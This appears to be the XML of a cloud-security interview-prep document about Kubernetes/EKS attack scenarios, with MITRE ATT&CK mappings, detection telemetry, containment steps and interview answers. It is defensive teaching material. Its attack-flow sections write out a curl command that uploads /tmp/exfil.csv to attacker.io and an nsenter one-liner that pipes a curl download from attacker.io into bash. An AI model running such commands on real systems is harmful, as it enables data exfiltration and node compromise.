              <w:t xml:space="preserve">→ curl -X POST https://data.attacker.io/upload -F file=@/tmp/exfil.csv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Detections with Full Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">kubectl exec from Unexpected Source IP / UserAgent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [K8s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Kubernetes audit log records an exec request (verb: create, resource: pods/exec) from source IP 185.220.x.x — not in the corporate IP range or known CI/CD runner IPs. UserAgent is kubectl/1.28.0 (linux/amd64) — a developer tool, not an SDK. Time: 02:31 UTC (outside business hours).</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KubernetesAudit.UnexpectedExecSourceIP | InteractiveContainerSession (TTY=true detected)</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CloudTrail for K8s API exec. Use K8s audit logs in CloudWatch (/aws/eks/&lt;cluster&gt;/cluster).</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Execution:Kubernetes/ExecInKubernetesPod — triggers when exec is performed on a non-debug pod.</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DIRECT SOURCE: audit.log — verb:create, requestURI:/api/v1/namespaces/payments/pods/payments-api-7d4f/exec, sourceIPs:[185.220.x.x], userAgent:kubectl/1.28.0</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Legitimate exec: from known developer IPs, during business hours, into non-production namespaces. Production exec at 2 AM from unknown IP with kubectl user-agent = immediate escalation. Add: does the service account have exec permissions? That's a RBAC gap to fix regardless of this incident.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive Shell + Credential Enumeration Pattern</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Falcon detects TTY allocation (interactive shell) in production pod. Within 30 seconds: printenv executed followed by grep with credential keywords. This sequence — exec → interactive shell → credential grep — is a known attacker TTPs pattern with no legitimate equivalent in production.</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InteractiveContainerSession | SuspiciousCredentialEnumeration.Container | Severity: High</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Downstream: DB connection from pod IP to RDS instance on port 3306 — VPC Flow Logs show new connection not in baseline.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CredentialAccess:Kubernetes/SecretsAccessed if attacker also lists K8s secrets.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exec event (Detection 1) + subsequent: kubectl get secrets if attacker escalates beyond env vars.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printenv alone is a low-severity finding. printenv + grep "password" + TTY shell in production = High. The combination and production namespace context make this HIGH confidence. Suppress only if pod is explicitly labeled debug:true with active session approval ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Database Connection Anomaly from Container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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New TCP connection from payments pod to RDS endpoint on port 3306. Connection not seen in 30-day baseline — the production app uses port 5432 (PostgreSQL), not 3306 (MySQL). Attacker used the wrong port initially revealing the anomaly. Even on correct port: mysql binary spawned from bash is NOT the application's normal DB driver.</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AnomalousDBConnection.Container | SuspiciousProcess.DatabaseClient (mysql CLI spawned inside web container)</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RDS API: DescribeDBInstances called from pod IP (if attacker enumerated). VPC Flow Logs: new TCP connection to RDS security group.</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direct finding. Correlate VPC Flow Log anomaly with CWPP interactive session detection.</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K8s audit. But: was a NetworkPolicy in place restricting pod→RDS connections to only the app port? If not — CSPM finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E6B6B"/>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Applications connect to databases at startup, not after an interactive shell is spawned. The process spawning the DB connection is the differentiator: node/python/java (legitimate) vs bash/mysql-CLI (attacker). CWPP provides process context that network logs alone cannot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Large File Written to /tmp and Uploaded via curl</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Database query produces a /tmp/exfil.csv file (drift event: file written post-start). Size: 340MB. Within 60 seconds: curl process spawned, executing HTTP POST to external endpoint with the file as form data. This curl POST is not in the pod's network baseline.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ContainerDrift.LargeFileCreated | SuspiciousDataExfiltration.CurlUpload | LargeVolumeExternalTransfer</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VPC Flow Logs: Large TCP upload from pod IP to external IP. Byte count = 340MB in 90 seconds.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Exfiltration:Runtime/AnomalousBehavior or UnauthorizedAccess:Runtime/DomainCommunication.</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direct K8s audit. Was egress NetworkPolicy enforced? This upload should have been blocked.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curl uploading files from production pods is almost never legitimate. Valid exception: log shipping via curl to logging service (unlikely — should use SDK). The combination of: drift (new file in /tmp) + large file size + curl POST to unknown external IP = confirmed exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A0522D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSPM — Service Account with pods/exec in Production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="A0522D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [CSPM]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CSPM continuously audits Kubernetes RBAC and identifies: ServiceAccount payments-api-sa has a RoleBinding granting pods/exec, pods/log, pods/portforward in the payments namespace. This is a pre-existing misconfiguration that enabled the attack. Finding was open 18 days.</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CSPM-RBAC-001: ServiceAccount with pods/exec permission in production namespace | Severity: HIGH | Age: 18 days</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CloudTrail. K8s audit: RoleBinding create event 18 days ago — who created it and why?</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GuardDuty finding for RBAC misconfiguration. This is a pre-attack CSPM signal.</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kubectl get rolebinding -n payments -o json shows the over-privileged binding. Creation timestamp and user in audit log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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A0522D"/>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pods/exec is a legitimate permission for debugging namespaces and developer tooling ServiceAccounts. It is NEVER appropriate for production application ServiceAccounts (those used by running workloads). CSPM should differentiate by namespace and ServiceAccount naming convention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Response Steps:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Delete and recreate the compromised ServiceAccount (token invalidation). 2) Remove pods/exec from all production namespace RBAC. 3) Rotate all DB credentials found in env vars. 4) Move secrets to AWS Secrets Manager via CSI driver. 5) Implement secret scanning in all git repos. 6) Notify DBA to audit all DB queries in the incident window from the pod IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to explain this scenario in the interview:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"kubectl exec in production is the loudest thing an attacker can do — it shows up in Kubernetes audit logs with the source IP, user agent, and timestamp. The problem is teams often don't forward audit logs to SIEM or set up alerts on exec events. I make K8s audit log forwarding to CloudWatch mandatory for every cluster, and exec events in production namespaces auto-generate a PagerDuty alert. The underlying fix is simpler: no application ServiceAccount should ever have pods/exec."</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3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCENARIO 5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">EKS DaemonSet Backdoor via Compromised ArgoCD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="4A4A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ArgoCD admin takeover → malicious DaemonSet → node-wide backdoor → cluster persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="4"/>
              <w:left w:val="single" w:color="999999" w:sz="4"/>
              <w:bottom w:val="single" w:color="999999" w:sz="4"/>
              <w:right w:val="single" w:color="999999" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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T1078.004</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Valid Accounts: Cloud Accounts</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Initial Access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ArgoCD admin UI exposed publicly with default credentials (CSPM finding open 11 days). Attacker authenticates as admin via Shodan-discovered endpoint.</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T1053.007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Scheduled Task: Container Orchestration Job</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Persistence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Attacker deploys a DaemonSet to kube-system namespace via ArgoCD, ensuring one malicious pod runs on EVERY node in the cluster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T1609</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Container Administration Command</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Execution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Malicious DaemonSet container uses hostPID:true and nsenter to execute commands on each host node via the K8s API</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T1136.003</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Create Cloud Account</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Persistence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From root on nodes, attacker creates a new IAM user with console access as a secondary persistence mechanism outside Kubernetes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bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.001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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable or Modify Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Defense Evasion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DaemonSet attempts to disable Falcon sensor on nodes by unloading the kernel module and removing the sensor service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Shodan scan finds ArgoCD UI at https://argocd.company.internal (public LB)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Default admin password never changed (argocd-initial-admin-secret unchanged)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Attacker logs in as admin to ArgoCD</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Creates new ArgoCD Application pointing to attacker-controlled GitHub repo</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Repo contains: DaemonSet manifest (kube-system namespace, privileged:true, hostPID:true, hostNetwork:true)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ DaemonSet image: 185.220.x.x/node-monitor:latest (attacker registry)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ ArgoCD syncs → DaemonSet deployed to ALL nodes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Each pod runs: nsenter --target 1 --mount --pid --net -- bash -c 'curl attacker.io/stage2 | bash'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Stage2 creates IAM user, installs reverse shell persistence, attempts Falcon sensor removal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Detections with Full Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ArgoCD Admin Auth from Unknown External IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [K8s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ArgoCD API server logs (forwarded to SIEM) show admin login from IP 185.220.x.x — not in corporate IP range. UserAgent: python-requests (automated tool, not browser). Login succeeds with username: admin. Immediately followed by Application create API call.</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CSPM: ArgoCD exposed via public LoadBalancer (finding 11 days old) + CWPP: SuspiciousAdminAuthentication.GitOps</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Load Balancer access logs (if ALB): HTTP 200 to ArgoCD /api/v1/session from attacker IP. CloudTrail shows no EKS events yet at this stage.</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immediate GuardDuty finding — login itself is not a GuardDuty trigger. Next stage: when DaemonSet pods access IMDS.</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ArgoCD Application create: user:admin, requestURI: /api/v1/applications, sourceIP:185.220.x.x. This is the first K8s audit trail.</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ArgoCD admin logins from developer IPs during business hours are legitimate. External IP at 03:00 UTC with python-requests user-agent is not. Correlate with: was there a 2FA challenge? Did any developer report a login? Source IP geo-lookup: does it match expected developer location?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DaemonSet Created in kube-system by ArgoCD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E6B3C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
